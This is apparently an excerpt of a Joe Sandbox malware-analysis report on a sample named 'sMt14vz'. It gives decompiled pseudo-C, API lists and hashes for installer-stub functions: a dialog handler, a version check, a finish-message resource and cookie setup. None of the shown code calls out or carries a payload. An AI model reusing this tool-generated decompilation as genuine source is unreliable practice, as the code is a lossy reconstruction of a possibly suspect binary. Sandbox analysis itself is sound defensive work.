                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d3486
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 010D3490
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 010D349A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,010D9154), ref: 010D34B2
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000838), ref: 010D34C4
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 010D34CB
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000002), ref: 010D34D8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 852535152-0
                                                                                                                                                                                                                                            • Opcode ID: 8fe498293f5a3b04782853b57d54044c5b9b472d99b1da768ace86e6163257c7
                                                                                                                                                                                                                                            • Instruction ID: 6eb429f9da4170dcfc1df63f6114b22e6575caddb1e1d2fe0d9256d932e47ac6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8fe498293f5a3b04782853b57d54044c5b9b472d99b1da768ace86e6163257c7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9301B179341324ABD7665F79E80C9AE3AA4FB45750B044014FEC69B984CF3EAA41CB82
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				char* _v12;
                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                                            				int _v32;
                                                                                                                                                                                                                                            				void* _v36;
                                                                                                                                                                                                                                            				int _v40;
                                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                            				long _t68;
                                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                                                                                            				intOrPtr _t97;
                                                                                                                                                                                                                                            				intOrPtr _t99;
                                                                                                                                                                                                                                            				int _t101;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				void* _t106;
                                                                                                                                                                                                                                            				void* _t109;
                                                                                                                                                                                                                                            				void* _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                                            				_t99 = __ecx;
                                                                                                                                                                                                                                            				_t106 = 0;
                                                                                                                                                                                                                                            				_v16 = __ecx;
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				_t103 = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_t106 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t62 = 0;
                                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                            						if(E010D2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                            						_v28 = _t68;
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_t99 = _v16;
                                                                                                                                                                                                                                            							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                            							_t93 = _v24;
                                                                                                                                                                                                                                            							_t87 = _v20;
                                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                            								goto L18;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                            							if(_t103 != 0) {
                                                                                                                                                                                                                                            								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                            								_v36 = _t73;
                                                                                                                                                                                                                                            								if(_t73 != 0) {
                                                                                                                                                                                                                                            									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                            										L15:
                                                                                                                                                                                                                                            										GlobalUnlock(_t103);
                                                                                                                                                                                                                                            										_t99 = _v16;
                                                                                                                                                                                                                                            										L18:
                                                                                                                                                                                                                                            										_t87 = _t87 + 1;
                                                                                                                                                                                                                                            										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										_v20 = _t87;
                                                                                                                                                                                                                                            										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L19;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t79 = _v44;
                                                                                                                                                                                                                                            										_t88 = _t106;
                                                                                                                                                                                                                                            										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                            										_t101 = _v28;
                                                                                                                                                                                                                                            										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                            										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                            										_t97 = _v48;
                                                                                                                                                                                                                                            										_v36 = _t83;
                                                                                                                                                                                                                                            										_t109 = _t83;
                                                                                                                                                                                                                                            										do {
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E010D2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E010D2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                            											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                            											_t88 = _t88 + 4;
                                                                                                                                                                                                                                            										} while (_t88 < 8);
                                                                                                                                                                                                                                            										_t87 = _v20;
                                                                                                                                                                                                                                            										_t106 = 0;
                                                                                                                                                                                                                                            										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                            											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                            												GlobalUnlock(_t103);
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												goto L15;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L15;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L20:
                                                                                                                                                                                                                                            				 *_a8 = _t87;
                                                                                                                                                                                                                                            				if(_t103 != 0) {
                                                                                                                                                                                                                                            					GlobalFree(_t103);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t106;
                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                            0x010d28f1
                                                                                                                                                                                                                                            0x010d28f4
                                                                                                                                                                                                                                            0x010d28f7
                                                                                                                                                                                                                                            0x010d28f9
                                                                                                                                                                                                                                            0x010d28fc
                                                                                                                                                                                                                                            0x010d28ff
                                                                                                                                                                                                                                            0x010d2901
                                                                                                                                                                                                                                            0x010d2907
                                                                                                                                                                                                                                            0x010d2a62
                                                                                                                                                                                                                                            0x010d2a64
                                                                                                                                                                                                                                            0x010d290d
                                                                                                                                                                                                                                            0x010d290d
                                                                                                                                                                                                                                            0x010d290f
                                                                                                                                                                                                                                            0x010d2912
                                                                                                                                                                                                                                            0x010d2920
                                                                                                                                                                                                                                            0x010d2937
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2944
                                                                                                                                                                                                                                            0x010d294a
                                                                                                                                                                                                                                            0x010d294f
                                                                                                                                                                                                                                            0x010d2a2f
                                                                                                                                                                                                                                            0x010d2a32
                                                                                                                                                                                                                                            0x010d2a34
                                                                                                                                                                                                                                            0x010d2a37
                                                                                                                                                                                                                                            0x010d2a41
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2955
                                                                                                                                                                                                                                            0x010d295e
                                                                                                                                                                                                                                            0x010d2962
                                                                                                                                                                                                                                            0x010d2969
                                                                                                                                                                                                                                            0x010d296f
                                                                                                                                                                                                                                            0x010d2974
                                                                                                                                                                                                                                            0x010d298c
                                                                                                                                                                                                                                            0x010d2a20
                                                                                                                                                                                                                                            0x010d2a21
                                                                                                                                                                                                                                            0x010d2a27
                                                                                                                                                                                                                                            0x010d2a4c
                                                                                                                                                                                                                                            0x010d2a4f
                                                                                                                                                                                                                                            0x010d2a50
                                                                                                                                                                                                                                            0x010d2a53
                                                                                                                                                                                                                                            0x010d2a56
                                                                                                                                                                                                                                            0x010d2a5c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d29b2
                                                                                                                                                                                                                                            0x010d29b2
                                                                                                                                                                                                                                            0x010d29b5
                                                                                                                                                                                                                                            0x010d29bd
                                                                                                                                                                                                                                            0x010d29c3
                                                                                                                                                                                                                                            0x010d29cc
                                                                                                                                                                                                                                            0x010d29d5
                                                                                                                                                                                                                                            0x010d29d7
                                                                                                                                                                                                                                            0x010d29da
                                                                                                                                                                                                                                            0x010d29dd
                                                                                                                                                                                                                                            0x010d29df
                                                                                                                                                                                                                                            0x010d29ec
                                                                                                                                                                                                                                            0x010d29f8
                                                                                                                                                                                                                                            0x010d29fc
                                                                                                                                                                                                                                            0x010d29ff
                                                                                                                                                                                                                                            0x010d2a02
                                                                                                                                                                                                                                            0x010d2a07
                                                                                                                                                                                                                                            0x010d2a0a
                                                                                                                                                                                                                                            0x010d2a0f
                                                                                                                                                                                                                                            0x010d2a19
                                                                                                                                                                                                                                            0x010d2a81
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2a0f
                                                                                                                                                                                                                                            0x010d298c
                                                                                                                                                                                                                                            0x010d2974
                                                                                                                                                                                                                                            0x010d2962
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d294f
                                                                                                                                                                                                                                            0x010d2912
                                                                                                                                                                                                                                            0x010d2a65
                                                                                                                                                                                                                                            0x010d2a68
                                                                                                                                                                                                                                            0x010d2a6c
                                                                                                                                                                                                                                            0x010d2a6f
                                                                                                                                                                                                                                            0x010d2a6f
                                                                                                                                                                                                                                            0x010d2a7d

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 010D2A6F
                                                                                                                                                                                                                                              • Part of subcall function 010D2773: CharUpperA.USER32(C2F4ED82,00000000,00000000,00000000), ref: 010D27A8
                                                                                                                                                                                                                                              • Part of subcall function 010D2773: CharNextA.USER32(0000054D), ref: 010D27B5
                                                                                                                                                                                                                                              • Part of subcall function 010D2773: CharNextA.USER32(00000000), ref: 010D27BC
                                                                                                                                                                                                                                              • Part of subcall function 010D2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D2829
                                                                                                                                                                                                                                              • Part of subcall function 010D2773: RegQueryValueExA.ADVAPI32(?,010D1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D2852
                                                                                                                                                                                                                                              • Part of subcall function 010D2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D2870
                                                                                                                                                                                                                                              • Part of subcall function 010D2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D28A0
                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,010D3938,?,?,?,?,-00000005), ref: 010D2958
                                                                                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 010D2969
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,010D3938,?,?,?,?,-00000005,?), ref: 010D2A21
                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 010D2A81
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3949799724-0
                                                                                                                                                                                                                                            • Opcode ID: 825103011987a8619dec091d1561dd23bd3f8550c42c478a3723d93ef8c3633a
                                                                                                                                                                                                                                            • Instruction ID: acbed8dadf80460c5825b17ac886ccf070cc8a617c83b540e95374752c01ba9a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 825103011987a8619dec091d1561dd23bd3f8550c42c478a3723d93ef8c3633a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15512A31E00219DFDB21DF9CC884AAEFBB5FF48701F14816AE985E3211DB359941CBA5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 32%
                                                                                                                                                                                                                                            			E010D4169(void* __eflags) {
                                                                                                                                                                                                                                            				int _t18;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t20 = E010D468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                            				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                            				if(_t21 != 0) {
                                                                                                                                                                                                                                            					if(E010D468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                            							L7:
                                                                                                                                                                                                                                            							return LocalFree(_t21);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(0x40);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t21);
                                                                                                                                                                                                                                            						_t18 = 0x3e9;
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						E010D44B9(0, _t18);
                                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0x10);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					_t18 = 0x4b1;
                                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E010D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            0x010d417d
                                                                                                                                                                                                                                            0x010d418f
                                                                                                                                                                                                                                            0x010d4193
                                                                                                                                                                                                                                            0x010d41b7
                                                                                                                                                                                                                                            0x010d41d3
                                                                                                                                                                                                                                            0x010d41e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d41e7
                                                                                                                                                                                                                                            0x010d41d5
                                                                                                                                                                                                                                            0x010d41d6
                                                                                                                                                                                                                                            0x010d41d8
                                                                                                                                                                                                                                            0x010d41d9
                                                                                                                                                                                                                                            0x010d41da
                                                                                                                                                                                                                                            0x010d41df
                                                                                                                                                                                                                                            0x010d41e1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d41e1
                                                                                                                                                                                                                                            0x010d41b9
                                                                                                                                                                                                                                            0x010d41ba
                                                                                                                                                                                                                                            0x010d41bc
                                                                                                                                                                                                                                            0x010d41bd
                                                                                                                                                                                                                                            0x010d41be
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d41be
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: memcpy_s.MSVCRT ref: 010D46E5
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,010D30B4), ref: 010D4189
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,010D30B4), ref: 010D41E7
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,010D9154,00010010), ref: 010D4554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                            • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                            • Opcode ID: 30e99ee1df7182d1bff3a69ee56f7802e6334c3c87a597f053dce26fe9eab285
                                                                                                                                                                                                                                            • Instruction ID: e6133ef353932fbbf77feaba1598881907ad9f0502a061f724bf21aec2f4ad7e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30e99ee1df7182d1bff3a69ee56f7802e6334c3c87a597f053dce26fe9eab285
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F01F4B9701315BBF3251A798C85FBB658EDBD86D5F004025BBC6E29C4DE79CC0141B5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D7155() {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				struct _FILETIME _v16;
                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                            				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                            				_t23 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                            					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                            					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                            					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                            					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                            					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                            					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                            					_t39 = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0xbb40e64e || ( *0x10d8004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                            						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                            						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0x10d8004 = _t39;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t37 =  !_t36;
                                                                                                                                                                                                                                            				 *0x10d8008 = _t37;
                                                                                                                                                                                                                                            				return _t37;
                                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                                            0x010d715d
                                                                                                                                                                                                                                            0x010d7161
                                                                                                                                                                                                                                            0x010d7165
                                                                                                                                                                                                                                            0x010d7178
                                                                                                                                                                                                                                            0x010d7182
                                                                                                                                                                                                                                            0x010d718e
                                                                                                                                                                                                                                            0x010d7197
                                                                                                                                                                                                                                            0x010d71a0
                                                                                                                                                                                                                                            0x010d71b1
                                                                                                                                                                                                                                            0x010d71b8
                                                                                                                                                                                                                                            0x010d71c4
                                                                                                                                                                                                                                            0x010d71c7
                                                                                                                                                                                                                                            0x010d71cb
                                                                                                                                                                                                                                            0x010d71d5
                                                                                                                                                                                                                                            0x010d71da
                                                                                                                                                                                                                                            0x010d71da
                                                                                                                                                                                                                                            0x010d71dc
                                                                                                                                                                                                                                            0x010d71dc
                                                                                                                                                                                                                                            0x010d71e2
                                                                                                                                                                                                                                            0x010d71e5
                                                                                                                                                                                                                                            0x010d71ee

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 010D7182
                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 010D7191
                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 010D719A
                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 010D71A3
                                                                                                                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 010D71B8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                                                                                                                            • Opcode ID: 8afb7afa08838a6561db57db3b765f4a405d62896f1d180afe4eeb068bdd2769
                                                                                                                                                                                                                                            • Instruction ID: 7a93c94579ca5d3ff7e55c055cb907c38faf7eb16655a9d5f2a41a49159afed6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8afb7afa08838a6561db57db3b765f4a405d62896f1d180afe4eeb068bdd2769
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC112E75E02208DFCB60DFB8D648A9EBBF5FF48355F654996E845E7204E7399A008B40
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E010D19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v520;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				struct HWND__* _t34;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t27 = __ebx;
                                                                                                                                                                                                                                            				_t11 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                            				_t34 = _a4;
                                                                                                                                                                                                                                            				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					_t32 = GetDesktopWindow();
